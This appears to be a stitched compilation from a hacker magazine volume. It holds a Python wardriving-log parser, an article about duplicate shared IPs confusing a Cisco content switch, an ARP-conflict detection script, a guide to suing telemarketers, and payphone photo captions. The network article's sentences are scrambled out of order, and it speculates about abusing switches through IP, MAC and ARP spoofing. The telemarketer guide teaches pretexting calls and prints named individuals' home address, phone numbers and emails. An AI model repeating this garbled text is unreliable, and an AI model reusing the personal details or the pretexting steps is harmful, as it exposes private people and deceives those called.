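Network 3: BSSID 00:11:22:33:44:77
 BSSID      : 00:11:22:33:44:77
 SSID 1
  Type       : Probe Response
  SSID       : "office"
  Encryption : WEP
 SSID 2
  Type       : Beacon
  SSID       : "office"
  Encryption : WPA+AES-CCM
 Channel    : 11
Network 4: BSSID 00:11:22:33:44:88
 BSSID      : 00:11:22:33:44:88
 SSID 1
  Type       : Beacon
  SSID       : "cafe"
  Encryption : WPA+TKIP
 Channel    : 6
"""


def _value(line):
    """Text after the first ':' of a '  Field : value' line."""
    return line.split(":", 1)[1].strip()


def parse_nettxt(text):
    """Squash the indented log into records: a ' BSSID :' line opens a record,
    ' Channel :' closes it, and only Encryption lines under a Beacon count
    (a probe response can advertise something other than what the AP beacons)."""
    nets, cur, in_beacon = [], None, False
    for line in text.splitlines():
        if re.match(r" BSSID\s*:", line):
            cur = {"bssid": _value(line), "encryption": [], "channel": None}
            nets.append(cur)
            in_beacon = False
        elif cur is None:
            continue
        elif re.match(r"\s+Type\s*:", line):
            in_beacon = _value(line) == "Beacon"
        elif re.match(r"\s+Encryption\s*:", line) and in_beacon:
            cur["encryption"].append(_value(line))
        elif re.match(r" Channel\s*:", line):
            cur["channel"] = int(_value(line))
    return nets


def classify(encryption_fields):
    """Bucket a network the way the article's percentages do."""
    joined = " ".join(encryption_fields)
    if "WPA" in joined:
        return "WPA2-AES" if "AES" in joined else "WPA"
    if "WEP" in joined:
        return "WEP"
    return "open"


def encryption_stats(nets):
    """Counter of open / WEP / WPA / WPA2-AES over the parsed networks."""
    return Counter(classify(n["encryption"]) for n in nets)


def channel_usage_json(nets):
    """The [{"id": channel, "value": count}, ...] document of Trick #2."""
    per_channel = Counter(n["channel"] for n in nets if n["channel"] is not None)
    return json.dumps([{"id": ch, "value": cnt} for ch, cnt in sorted(per_channel.items())])


if __name__ == "__main__":
    records = parse_nettxt(SAMPLE_NETTXT)
    print(dict(encryption_stats(records)))
    print(channel_usage_json(records))
```

Network 3 in the sample is the case the `ssid` flag in the awk script exists for: its probe response says WEP while its beacon says WPA+AES-CCM, and only the beacon value is counted. Run over a directory of real logs, `parse_nettxt` replaces the `cat *.nettxt | awk` stage and `encryption_stats` replaces the `sort | uniq | grep | wc` tail.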
168. functional testing.0.100-110 | | 192. This article details the problem I created. I informed the users that I was not sure what was wrong and would get back to them when I had solved the problem.10 | | Secondary: 192. although I have a few guesses as to why. My project was simple: install and configure one GNU/Linux server with a collection of
Using Network Recon to Solve a Problem
by Aesun
shared IP addresses for an application. I managed to create my own networking problem out of sheer stupidity (which is how I usually manage to create technical problems for myself).namely myself.1 | ---------------------------------------------| | ------------------------.VOLUME 26
Disclaimer: I am not a computer networking expert. well. lo and behold. it would even detect when the primary server came back online and drop the shared IP addresses.-------------------------| Primary: 192. The IP addresses were being used for a software system that was not online yet. the applica-
80
. while it was failing for some of the addresses and not others.168. I didn’t really think it would matter. no foul. I ran the application and noticed that. of course. Since they were not being tested at the time. and.100-110 | ------------------------. the systems did need to be functional for. I began ping tests and all of the addresses were answering. The host names and internet protocol (IP) addresses have been changed to protect the (more or less) innocent .-------------------------| | | | | Shared Range: | | Shared Range: | | 192. this symptom was indicative of a much larger problem. The script worked perfectly during tests.168.168. During testing I came across a problem: when the secondary server came online. once the first server was set up and functional. To illustrate the configuration here is an example:
---------------------------------| Everything Else | ---------------------------------| ---------------------------------------------| GSS/CSS Device 192. I got a call.0.11| ------------------------. I accidentally left two Linux systems configured with identical shared IP addresses on the same virtual local area network (VLAN). build. The application was working with some of the IP addresses but not others. I left the problem to work on a production issue and accidentally left the shared IP addresses on both systems.-------------------------A few days went by as other projects took priority.1 and 192. Then.0. the addresses appeared to be okay but the application could not find the new location. I also want to note that I have no idea how this worked.168. Little did I know. install and configure a warm backup GNU/Linux system which would fire up the shared IP addresses if the primary server went offline. all addresses were available. only that it did work. Suddenly.THE HACKER DIGEST .168.0.1. I deal with networks day in and day out from a UNIX administrator’s perspective and have maintained simple networks. Regardless. Recently. the possible repercussions of what I discovered. I logged into the secondary system and fired up the application server. The users testing the new system didn’t do any testing for a while and then. no harm. After troubleshooting for a few hours. the rather strange way I fixed it.0.

yet some of the IP addresses still would not work with the primary server. Using nmap. I discovered that some packets were landing on the primary server. It was at this point I realized the problem was not with the hosts or any clients. was to clear the arp cache on both servers. 2. Again. they still could do things incredibly stupid. I didn’t have time to track down the overworked network administrator. I then remembered that. fired up a tcpdump session targeting the application port on each one. packets were split and landing on the same systems they had before. I deduced (correctly) that the device was either a global or content switch. if the hardware address changed then the switch would simply update the tables and move on. I have not had a chance to try any experiments. but when I did a domain lookup on the device it had addresses on two different networks. Under normal circumstances. What quick and easy tool might I have made sure was installed on a system with heavy network use in an network environment I was unfamiliar with? Nmap. I now had a working theory as to what was wrong: the switch had the wrong hardware address in its tables for the IP address. one network was the same one that the servers were on while the other was a locally managed network. of course. but how to fix it? It was a tough problem because the main IP address was. Tools such as packet sniffers and aggressive scanners do have their place in the troubleshooting realm. and started pinging the IP addresses and port that the application was using from a third system.THE HACKER DIGEST . voila. of course. Thanks for reading and keep hacking.
81
. I logged in to both servers using secure shell and fired up tcpdump but filtered out secure shell traffic.. while others were landing on the secondary server. that had not happened in the case of this particular device. While I thought the findings were interesting.VOLUME 26
tion started working. I also noted the replies from the servers were going to the same device. The easiest cure.. The secondary server’s shared IP addresses were offline. I logged into both servers using secure shel. when aggressive network traffic fires from a particular host into (or across) a switch or router it causes the switch or router to go through a quick check of what it knows about the device talking to it. to date. I then resorted to a tactic I never like to do – I rebooted both servers. in this instance I actually used them to fix a problem. using a tool that could change a hardware address on an interface and another tool that could spoof an address. he agreed that not only was IP/MAC spoofing a possible issue but arp spoofing as well. I fired off a fingerprinting scan from the primary server and spoofed the address using the shared IP address instead of defaulting to the actual interface address and. For some reason. Still no dice. I did a little research and found a rather long document detailing bugs in GSS switches particular to MAC addresses and the CSM software. Even though network systems have improved greatly over the last several decades. Although I had used both of them for diagnostic purposes before. often. even though he had never used GSS and/ or CSS. ? Unfortunately. Note that the incorrect path to the secondary server was stuck for well over an hour after rebooting. I did hit up a friend of mine who is a Cisco specialist and. It was definitely a network issue. I recalled from my addled brain that switches often maintain a table of IP address to hardware address mappings. My first instinct was address resolution protocol (arp) cache. I restarted my packet sniffers in full verbose mode and noted that the packets going to the secondary server also had its machine address (MAC) in the packet data. The nature of what happened is telling with regard to Cisco’s Content Switch Management (CSM) software. 
There were several bugs that could have been related to the behavior I had witnessed. No dice. problem solved. it was time to start researching the problem to see what was happening. This is when the trouble started. in fact. so I began to think up of ways to solve the problem on my own. one persistently hit a GSS or CSS device . I had seen in the past where a host arp cache could cause potential routing problems. different on both servers (which I think is part of why the problem existed in the first place). I needed more data. then what possibilities would it open up? What if. Once again. I realized my users needed their test systems back to get their work done and decided to knock the shared IP addresses offline on the secondary system. I was a little out of my territory as I had never been in a GSS and/or CSS switched environment. Which immediately made me wonder: If real dual IP addresses messed up the mappings. Once again. I knew what was wrong. It was at this point that I realized I had come across something odd and decided to start doing some network recon to see if my guess was right. I learned two invaluable lessons: 1.
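To make the duplicate-address condition described above visible from a capture, here is an added example (not code from the article): a Python script that parses the ARP replies in `tcpdump -e -n arp` style output and flags every IP that more than one MAC answers for, scoped to the shared range. The capture lines, MAC addresses and timestamps are constructed to mirror the article's diagram.

```python
"""Flag shared IP addresses that more than one host is answering for.

Added example, not code from the article: it parses ARP replies out of
`tcpdump -e -n arp` style output and reports every IP claimed by two or
more MAC addresses, which is the condition the article's two Linux servers
were in.  The sample capture below is constructed; the MACs, timestamps
and the 192.168.0.x addressing are made up to mirror the article's diagram.
"""
import ipaddress
import re
from collections import defaultdict

# The shared range the article's failover script managed (192.168.0.100-110).
SHARED_RANGE = list(ipaddress.summarize_address_range(
    ipaddress.IPv4Address("192.168.0.100"), ipaddress.IPv4Address("192.168.0.110")))

# tcpdump -e prints an ARP reply as "<ts> <src mac> > <dst mac>, ethertype ARP
# (0x0806), length 42: Reply <ip> is-at <mac>, length 28".
ARP_REPLY = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) .*Reply (?P<ip>\d+\.\d+\.\d+\.\d+) "
    r"is-at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_arp_replies(lines):
    """Return (timestamp, ip, mac) for every ARP reply; requests are ignored."""
    replies = []
    for line in lines:
        m = ARP_REPLY.match(line)
        if m:
            replies.append((m["ts"], m["ip"], m["mac"].lower()))
    return replies


def find_conflicts(replies, networks=None):
    """Map each IP answered by more than one MAC to its sorted MAC list.

    networks, if given, is a list of ipaddress networks; only IPs inside
    them are considered, so the check can be scoped to the floating range.
    """
    claims = defaultdict(set)
    for _ts, ip, mac in replies:
        addr = ipaddress.ip_address(ip)
        if networks is None or any(addr in net for net in networks):
            claims[ip].add(mac)
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


def mac_flaps(replies):
    """Per IP, how many times the answering MAC changed across the capture.

    The switch's stale table is not visible from the hosts, but an IP whose
    answering MAC keeps flipping is the symptom an operator sees first.
    """
    last, flaps = {}, defaultdict(int)
    for _ts, ip, mac in replies:
        if ip in last and last[ip] != mac:
            flaps[ip] += 1
        last[ip] = mac
    return dict(flaps)


# Constructed capture: primary (...:10) and secondary (...:11) both answer for
# 192.168.0.100, while .101 and the servers' own addresses have one owner each.
SAMPLE_CAPTURE = """\
10:00:01.000100 00:11:22:33:44:10 > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.0.100 is-at 00:11:22:33:44:10, length 28
10:00:01.000200 00:11:22:33:44:11 > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.0.100 is-at 00:11:22:33:44:11, length 28
10:00:02.000100 00:11:22:33:44:10 > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.0.101 is-at 00:11:22:33:44:10, length 28
10:00:03.000100 00:11:22:33:44:10 > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.0.10 is-at 00:11:22:33:44:10, length 28
10:00:03.000200 00:11:22:33:44:11 > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.0.11 is-at 00:11:22:33:44:11, length 28
10:00:04.000100 00:11:22:33:44:01 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.0.100 tell 192.168.0.1, length 28
10:00:04.000200 00:11:22:33:44:10 > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.0.100 is-at 00:11:22:33:44:10, length 28
"""


def main():
    replies = parse_arp_replies(SAMPLE_CAPTURE.splitlines())
    for ip, macs in find_conflicts(replies, SHARED_RANGE).items():
        print(f"{ip} is answered by {len(macs)} hosts: {', '.join(macs)}")
    for ip, n in mac_flaps(replies).items():
        print(f"{ip}: answering MAC changed {n} times in this capture")


if __name__ == "__main__":
    main()
```

On a live system, feed it `tcpdump -e -n -l arp` output instead of the constructed sample; a conflict on a shared address is the cue to check which host the failover script left the address on.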

Suing Telemarketers for Fun and Profit
by Sai Emrys 2600@saizai.com

I would like to share with you some information and suggestions about how you can cash in on the illegal actions of your telemarketers. NOTE: The information below is actual information that I used to get an actual settlement check.

How it started.

In October '08, I began receiving repeated calls from telemarketers, primarily in the form of an automated telemarketing message saying that it was the 2nd (or 3rd, etc., but always final) notice that my car insurance was about to expire. (I haven't had a car in two years. I get around by Ninja.) These started to annoy me, especially as I know that they are illegal. Specifically what is illegal about these calls (see appendix below) is that: a) They're automated, recorded messages to a home or cell phone. b) They don't include the name of the calling party at the beginning of the message. c) They don't include the phone number or address of the caller. d) They called a number on the Do Not Call list. e) They failed to provide a written copy of their Do Not Call list maintenance policy. Rather than just yell at them or make useless complaints to the FCC, I decided to retaliate in a way that would have some real teeth, and get them to pay. Here's how you can do it too.

Step 0: Mindstate

To do so, you must act as if you are actually going to sue these people. It will involve some paperwork and out of pocket costs, up to ~$150, as well as actual negotiation with your adversary. Although it is highly likely that you will settle out of court, it needs to be convincing, specific, clear, and trustworthy. Ensure that you have evidence that you can legally show in court to a judge that is sufficient to demonstrate that a) calls were made to you illegally and b) the party you're suing is responsible for those calls. If any of that would dissuade you from proceeding, don't bother starting. This is worth doing, though. Why? If enough people sue (or make credible enough threats that they decide to settle), then they'll go out of business and hopefully switch to doing something with a bit less scumbaggery. As is, their risk of having to pay out is low enough to be a viable part of their operating costs.

Step 1: Keep a log

You need to keep a log of every single time they call you. Go to http://donotcall.gov and make certain that all of your phone numbers are on the Do Not Call list. Be sure to click the link in their response email, and save a copy (for bringing to court) of the email confirmation they send you. Write down the time, caller ID number, whether it was an automated call, whether the message mentioned the caller's corporate name at the start, and whether it included their phone number or mailing address. If it is legal in your state (http://en.wikipedia.org/wiki/Telephone_recording_laws), record all your calls with telemarketers. However, since these will be incoming calls, you may need special equipment to do so. If it is not legal for you to do so (e.g., in a 'two party consent' state), make sure that one way or another you make as detailed and accurate a transcript as possible; I'm sure you can think of ways to do so that don't involve having to mention in court that you recorded the call. If possible, also try to obtain third party records (e.g., from your phone company) that support your own notes.

Step 2a: Finding out who is calling you - initial information

First off: whatever it says on your caller ID, it's probably a lie (http://en.wikipedia.org/wiki/Caller_ID_spoofing). This is illegal, but they will do it anyway. Unless you're very lucky, it's just someone innocent whose number the telemarketers have spoofed. Don't bother them. However, if you Google the number, you'll likely find out a whole lot of information about them from others who have gotten the same call. Be aware that 99% of the posters will not know any more than you, and the information about the telemarketing outfit is no longer valid (they're a fly-by-night operation). Be prepared to be blown off, lied to about the legality of their operations, or, more likely, hung up on.

What you can do is called "social engineering" (http://en.wikipedia.org/wiki/Social_engineering_(security)). Telemarketers are calling you for a reason: they want to sell you something. To do so, they need to actually talk to the 0.5% of people who respond and sell them on the product. If they get even a hint that you are not in that bottom 0.5%, they will hang up on you immediately. You can exploit this single vulnerability. What you do is simple: play dumb and play along. Be interested in what they're selling. If you try to ask them anything about their company, how to contact them, how they got your number, or how they even know that you have a car, they'll hang up on you. Make up a name, address, car, etc. Write it down, so that you can repeat it if they ask again. Try to make it sound natural, and try to make your requests for information seem as much as possible a natural part of *their* script. Your goal is to get them to tell you a website, business name, license number, and real phone number (call it back, see if they answer). Ask if there's some direct line where you could call them back after you've thought about it, because you're really interested but just need to think it over / ask your spouse / etc and would really like to finish the deal once you get their approval. They will try to avoid this. They will give you a fake 800 number first. They will transfer you several times while they "verify" things and "contact their agent." They will make up "discounts" they're giving you, ask you to say that you decline it and that they won't be able to offer it again, say that you need to close the deal now, say that you need to have trust, etc. It is all complete bullshit, but you must play along. They will lie to you. Act hooked, interested, and just wanting to get back in touch with them. Do not be angry with them; do not ask anything implying that you know what they're doing is illegal (until the very end when the game is up and you might as well get them on a couple more violations). Unless you're very lucky, there are multiple companies involved (see Step 3), so it can be confusing. For me, I had four leads leaving the call: "Consumer Direct, Orange County", "877-539-8557" (can't be reached), "consumerdirectwarranty.com", and "949-309-3751 / 3753" (the telemarketers' actual phone number).

Step 2b: Turning initial information into extensive information

What you should have now is a name, phone number, website, and whatever else you need. That's not enough to sue someone, but it's enough to get enough ;-) Now you need to turn that into actionable information. Specifically, what you need are the formal business name of the people who called you, their legal address for service of process, and the name, address, and DIRECT phone number of one of the real people behind the scenes. These steps are only partially in order. You will need to do multiple passes as you get more information, to spider through the results:

1. Search Google and http://switchboard.com for any phone numbers or corporate names you have found. Be aware that you may need to try a few variants before you find the right ones.

2. Enter all of those websites into http://whois.net and record all contacts that are for real people. E.g., there was no useful WHOIS information for consumerdirectwarranty.com, but warrantyadminservices.com gave me the CEO: "Jim Sletner (info@safedatainc.com) / +1.5307229099 / P.O. Box 992050 / Redding, CA 96099" and website guy: "Insignia Web" (note the resemblance to insigniasd.com). If you're lucky, this will get you the real contact info for both their tech guy and their CEO.

3. Go to http://onsamehost.com/ and look up websites they mentioned. Most will be irrelevant (it's probably a cheap shared host). E.g., a search for consumerdirectwarranty.com showed that the same IP, 204.9.77.216, hosts contractpipeline.com, insigniasd.com, thatkitchenplaceredding.com, and warrantyadminservices.com. Check to see if there's a different response with interesting information if you go to the base IP address. E.g., http://204.9.77.216 is a Plesk control panel, showing the admin's email as srkinyon@yahoo.com. Some Googling reveals that to be the email of "Steve Kinyon, President/CEO, Insignia Software Design, Inc., 2305 Court St., Redding, CA 96001 / 530-243-4958".

4. Look up any corporate names at your Secretary of State website. In CA, this is http://kepler.sos.ca.gov/. E.g., I found SafeData Management Services C2330112, Warranty Administration Services C3060269, Manufacturer's Direct Warranty Services C3060709, United Fidelity Funding Corp. C2900323, Insignia Software Designs C2571273, and Global Service Partners LLC. Specifically, you want to make sure you record the agent for service of process; that is the person to whom you will send legal papers (including your "pay me or I sue" letter).

5. If you know what county they live or operate in, do a Fictitious Business Name (FBN) search. For Orange County, this is http://cr.ocgov.com/fbn/index.asp. These public records all contain names and addresses, and are necessary if you want to sue the business. E.g., searching for "national dealers" or "%warranty%" [% is the MySQL wildcard] gave me NATIONAL DEALERS WARRANTY SERVICE, 25910 Acero, Suite 200, Mission Viejo, CA 92691, and the names of the people using that FBN: Kamisha Daniel, Martinee Jackson, Mario Moreno.

6. Google their addresses. If you're lucky, you'll just have found their CEO. E.g., switchboard.com gives the home phone and address of a couple Sletners living in Redding, CA. A couple calls later to eliminate random cousins yields the answer: "15676 Old Stage Coach Rd, Redding, CA 96099 / 530-243-328".

7. See if you can find other businesses in the same building. Call up those businesses and (very, very politely) ask for the landlord's information (name and phone number). Call the landlord and ask who the tenant of suite X is, and what their direct phone number is. E.g., I found out that their landlord is Dolphin Partners and the cellphone number of one of the partners; from there I was able to find out the actual address of the telemarketing outfit.

8. Call the phone numbers a few times. Try it both during their hours of operation (so you get a live operator) and after (so you get their voicemail messages). Try numbers that are a few off higher and lower than the number you got; they will probably be on a multi-line system and own many sequential numbers. This can make for great fun, and a good way to practice your modifications of their script. E.g.: Direct number I got was 949-309-3751 / 3753. Their main number is 949-309-3750, and they own numbers up through at least 3780. 949-309-3750 is answered as "United Fidelity Funding Corporation." Several of the reps from 949-309-3751 onwards answer as "National Dealers Warranty Service" or "Warranty Services." The direct line for Kamisha Daniel, one of the co-owners, is 949-309-3773. This is the person to call if you have a lawsuit ready to go and you want to settle. (See Step 3 below first.) If you dial 949-309-3750 extension 0, you would be routed directly to their call center, as if they had called you, so you don't have to wait for them to call you. They can't tell the difference.

9. Find out their phone service provider. Call up a few providers that operate in the area and ask for their legal compliance center's phone number. (See the appendix for their contact information.) Then ask them to check whether they are the provider for the phone numbers you know to be used by the telemarketers. You'll need this later for subpoenas.

10. Blog about it. They really really don't like it when you do this, and it makes them look bad. Why? Because it allows other people, like you, reading this article, to find out who they are and sue them. It also helps you because you may make some contacts with people who know more about them and can offer advice that will be helpful to your case.

Step 3: Understand the structure

It took a while for me to uncover enough information to do this. There are at least three layers of companies involved in this operation:

1. Actual telemarketers. In my case, this was "National Dealers Warranty Service" (not Inc., just an FBN). These companies constantly change, with more or less the same script. Typically, the telemarketers are not very legally savvy, and rely more on not getting caught–and dissolving, moving, and starting over again if they do–than actually being able to win any cases that are brought to court. They are in business because very few people successfully find out who they are, and fewer still actually go through to the point of suing or settling. At a cost of $2500-$7500+ per suit in small claims (plus their legal fees), this would add up; if it's a small number, it can be written off as the cost of business, and most people don't. Discovering the name "National Dealers Warranty Service" (the true company name of the actual telemarketers, rather than the warranty sellers) was the decisive point in my case. This plus the FBN search gave me all the information I needed to make a very credible legal threat against both of them, and this information was critical to that.

2. Product shell companies. In my case, this was "Consumer Direct Warranty Services," whose name the telemarketers cite and claim to be. It's not a real company per se (though it's listed as one); it's more like one of several faces of the real company. (The Nevada face is "Warranty Administration Services.") They are the ones whose name is going to be on actual product contracts. They do not place any calls directly.

3. Parent product company. In my case, this was "SafeData Management Services, Inc.," which is the "principal" (see appendix, "principle of agency"). They do not, however, make any calls to you directly; they just handle the product being sold by the telemarketers. They are too big an operation to easily just dissolve and reform every few months, which means they're also a much better target for prosecution–but also one that's a bit more able to defend themselves. The parent company will probably be perfectly happy to drop the telemarketers just as soon as they appear to be a liability; as far as they're concerned, telemarketers are a replaceable commodity. Because of this, you may be getting calls from many different telemarketers on behalf of the same people. In legal terms, the telemarketers are the "agent" of the parent company, and you can sue and collect from either or both–but they will try to tell you otherwise. Specifically, if you try to sue them, they'll claim that they're not liable, only the telemarketers are. (This is false, see below; both are liable to you.)

Step 4: Profit

Now that you've done your homework, review it and make sure it's in order.

1. Get papers ready. If you're filing in CA civil court, go get form SC-100 (http://www.courtinfo.ca.gov/forms/fillable/sc100.pdf) and fill it out. It's very straightforward. Specifically, you'll need: 1) A full, detailed log of every call they made to you. Include all the details (e.g. the entire message you heard, if any) and what about that call was illegal (see the list at the top). 2) The full formal name of the company, their address, their phone number(s), and their agent for service of process. 3) The will to follow through with this despite a bit of runaround.

2. Offer to settle. Under CA law, for small claims at least, you are required to contact the people you are about to sue to first try to settle the matter in good faith. What this means is that you call their CEO and say (from a prepared statement) that you are about to sue them for violation of the TCPA, TSR, and CA CLRA (or insert applicable laws here, see below), and would like to know whether they are interested in settling the matter out of court to avoid the hassle and expense of court. You'll probably need to leave a callback number while the secretary you tell this to calls the CEO and their lawyer; be sure to give plenty of time for this. Most likely, they'll brush you off the first time. If they don't get back to you within a few days, call again saying that unless they call you back within a reasonable, specified period of time (e.g. 3 business days), you will treat their response as a refusal to settle and proceed with the lawsuit. If it does come to a settlement, deciding on the final value and terms is just like bartering for a car. My court claim was for $7500. Their initial settlement offer was $1500. I eventually settled with SafeData for half that amount, with the caveat that I had to take down my blogged information about them. I went through this process with NDWS as well, but a) they flaked out when I insisted that they have their contract notarized, and b) they wanted to include a gag clause to prevent me from discussing it. On receiving the notarized settlement from SafeData and cashing their cashier's check, I filed a dismissal with prejudice with the court, preventing me from suing them again for the same charges (but see below). One advantage in this case is that, because they are only an FBN and not a corporation, I can sue (and collect against) them as individuals, "severally and collectively", and that I can continue my suit for the rest of it against National Dealers Warranty Service; if they had incorporated, I'd only be able to sue the corporation, which at this point would probably not have any assets to collect.

3. File suit. You'll have to go to court, give the clerk your documents, make sure they're entered correctly, etc. In CA, it'll cost $70-150. Then hire a process server near your adversary to serve the filed court order on them. It may take a few hours, depending on how hard they are to reach. Be sure you get a signed "proof of service" back from the process server and file it with the court, or your case may get thrown out. They'll be much more eager to settle once you've had them served with your court order. You may want to prepare subpoenas also. Think of all the documents that the telemarketers, their phone company, your phone company, or others might have that will help you prove your case. Unfortunately, according to my phone service provider, AT&T's legal compliance division, they do not keep subpoenable records of call detail records (CDR), including automatic number identification (ANI) and originating private branch exchange (PBX), for incoming calls to landlines - only for outgoing calls and calls made to cellphones. However, it may be that their story changes when given an actual subpoena; I haven't tested this yet.

I recommend that you refer to the excellent Nolo Press book, Everybody's Guide to Small Claims Court; it has a lot of useful information about the process and requirements. A substantial portion of it is available through Google Books search. I also highly recommend that you read through the California Courts Self-Help Center (http://www.courtinfo.ca.gov/selfhelp/smallclaims/). If you don't live in CA, you should find out whether your state has laws similar to the CA CLRA (see below). Please note that I am not a lawyer, and I'm definitely not your lawyer. I am, really, someone who used Google and my brain to resolve a matter like this to my satisfaction. You should do your own research also, using this as a starting point.

Step 5: Taking it even further

I've only discussed the procedure for financial recourse. However, injunctions are provided for as one of your recourses under the TCPA and CLRA. Small claims courts do not have jurisdiction to issue injunctions. To obtain one (and thus put them out of business or face arrest), you will need to go to full-scale civil court. This involves lawyers and higher court costs (filing fees alone are $200-300). At that point, we wander out of the territory that I can cover in this article and that is easy to do on your own. However, under California law at least, lawyer's fees are recoverable as part of your damages. As a result, you will want to include them in your calculation of damages and in your demand letter. Ironically, one day after I settled with SafeData, I got another call with the same pitch - from a different telemarketer, but with the same parent company behind it. This means that a) I immediately get to put my blog posts back up (because they are now based on the new incident) and b) I will be suing them in superior civil court for an injunction and significantly higher costs. I hired a lawyer for this case, on contingency. I'm continuing my suit in court; we'll see how that turns out. If you'd like to know more about my cases, check out http://saizai.livejournal.com/tag/tcpa or email me. Happy hunting! Google and Wikipedia are your friends.

Appendix: Know Thy Law

Principal of Agency
See The Elements of Business Law by Ernest Wilson Huffcut, §126, "Liability of principal to third party" for details. The principal is legally liable for the actions of their agent. What it means: you can sue both the telemarketers (who are acting as the agent de facto of the warranty sellers) and the warranty sellers themselves (who are called the principal). You can collect judgment against both, but you only get to have the single amount, not twice as much. They are both responsible for paying you off. If the agent is behaving in a way that violates their contract with the principal, then that is a matter for the two of them to resolve between themselves using a suit for indemnification, and not your problem. See also FTC v. Venkataraman (FTC won by settlement).

Telephone Consumer Protection Act (TCPA)
47 U.S.C. § 227(b)(1)(A)(iii) - making automated calls to cellular phones
47 U.S.C. § 227(b)(1)(B) - making automated calls to residential line w/out prior express consent
47 U.S.C. § 227(d)(A)(1) - all recorded messages must state identity of caller at beginning of message
47 U.S.C. § 227(d)(A)(2) - ditto, and at some point give their phone or address
47 U.S.C. § 227(c)(3)(F) - making a 'telephone solicitation' to anyone on the Do Not Call list

Private right of action
47 U.S.C. § 227(b)(3)(A) - sue in state court for injunction
47 U.S.C. § 227(b)(3)(B) - to recover actual monetary loss or $500 in damages for each violation, whichever is greater
47 U.S.C. § 227(b)(3) - court may increase fine to up to $1500 per violation if it finds the defendant 'willfully and knowingly violated this section' (easily established by sending them a C&D letter by certified mail)
47 U.S.C. § 227(c)(5) - if received more than one call in any 12 month period on behalf of the same entity, same as (b)(3)(A&B) above including tripling clause

Public right of action
47 U.S.C. § 227(f)(1&2) - state AG may sue in federal district civil courts
Statute of limitations: 4 years per 28 U.S.C. Section 1658.

Note: 1 call = up to 1 violation of TCPA, per Blockburger v. United States, 284 U.S. 299 (1932). Therefore the total amount *per call* under TCPA alone is $500-1500; that is only for the TCPA violation, it doesn't include damages under the TSR or CLRA. Also 10 F.C.C.R. 12391, 12397 (1995) and FCC 00-378, October 23, 2000, footnote 24 for official policy. However, the Blockburger interpretation is not held everywhere, see Sznyter v. Malone, and thus a single call to you may constitute two violations - one under (b)(1), and one under (c)(3). It is purely at the judge's discretion, so it won't hurt you to try to claim one violation per infringing section (~4 per call) and see how your local court interprets it. Note that (c)(5) is a separate action.

Federal Trade Commission's Telemarketing Sales Rule (TSR)
47 C.F.R. § 64.1601 (4)(e) - telemarketers must transmit caller ID (CPN or ANI) & name of telemarketer or their client, must not block caller ID, must be a number to which one can make a do not call request

CA Consumers Legal Remedies Act
CA Civil Code §1770 (a)(22)(A) - unsolicited prerecorded message without real human first giving caller name & address or phone number
CA Civil Code §1780 (a) - sue for actual damages, restitution, punitive damages, injunction, & whatever else the court thinks is appropriate
CA Civil Code §1780 (d) - winner gets attorney fees & court costs
CA Civil Code of Procedure §1021.5 – ditto
CA Business & Professions Code §17200 - injunctions; Statute of Limitations: 1 yr
CA Business & Professions Code §17538.43 - unsolicited faxes ($1500/fax if from outside CA, $3000/fax if from inside)
Note: CA Civil Code §1780 (a) means that you get to sue for any amount up to the cap of the type of court you filed in. Make a convincing case that the opposing party is scum who are knowingly and flagrantly calling tens of thousands of people illegally and flouting the law, and that will be a high amount.

CA Small Claims Court limitations
CA small claims court limits for claims are $7500 twice a year, $2500 afterwards, per plaintiff. If you want to sue for more than that, then you should either: a) Sue separately for separate incidents, b) Sue in superior civil court (i.e., the normal, non-small-claims variant), or c) Get them to settle for a reasonable amount by credibly threatening to do a) and/or b).

Telco subpoena resources
AT&T landlines: 800 291 4952 x9
AT&T wireless: 800 635 6840
Alltel / Windstream landline: 888 558 6700 x1
Alltel wireless: 866 820 0430
Verisign / Focal Comm. / Level 3: 918 547 9618
Socal Comm.: 312 895 8978
Many of these will tell you the service provider of a number if you ask nicely. E.g., "Could you please check whether you're the right people to subpoena for this number?" will often give you an answer like "No, that's Focal-Verisign:7058", and then you know whom to call next. Be sure to ask what records they can provide, how to word the subpoena, whom to address it to, how much it'll cost, etc.

Eastern European Payphones

Serbia. Found in Belgrade, these phones seem to be the prevailing model throughout the city and possibly the entire country. Photo by Stevan Radanovic

Eastern European Payphones

Ukraine. Both of these phones were seen in the city of Cherkasy. One is a newer model while the other is a slight bit older. See if you can figure out which is which. Both are operated by Ukrtelecom. The older one was actually attached to the former KGB building. Photo by Alex Kudelin

Foreign Payphones

Hungary. Seen in Szolnok in a quaint but graffiti ridden booth, this phone is operated by T-Com, a fully consolidated subsidiary of German phone giant Deutsche Telekom, the company best known for inventing the pink handset. Photo by Rob Craig

Foreign Payphones

Malaysia. Seen in the state of Johor in West Malaysia, these are two distinct types of payphones that have each been around for a while. The first can be found in restaurants and other establishments while the second is more likely to be seen outdoors or in an unsecured environment. Photo by Jayakanthan Lachmanan

Payphones of the Old World

Egypt. This phone box was located on the bank of the River Nile, just outside the Temple of Kom Ombo. Photo by Ben Sampson

Payphones of the Old World

Egypt. Another common type of phone that can be seen throughout the country. This one was found in Luxor. Photo by troglow

Payphones of the Old World

Ukraine. Seen in Lviv, this phone has obviously seen it all and still has managed to retain a sense of fashion. Photo by c. sherman

Payphones of the Old World

Vatican City. Technically a country right in the middle of Rome, this may very well be the only payphone in existence there. It can be found at St. Peter’s Basilica on the “roof” overlooking Piazza San Pietro. From this phone you are eye level with the 140 statues of saints. Photo by Da Beave

More Foreign Payphones

Suriname. Found at the Torarica Hotel in Paramaribo, this payphone lacks an enclosure but has a sticker with the website for Telesur, the national telecommunications operator. Photo by TProphet

More Foreign Payphones

Japan. A stylish and very busy phone, which was seen near the grounds of Kumamoto Castle on the island of Kyushu. Photo by LART

More Foreign Payphones

Canada. Found in Fort Edmonton Park, a historical park in Alberta. It’s amazing what you can do to an ordinary payphone with a little imagination and rustic charm. Photo by Carsen Q.

More Foreign Payphones

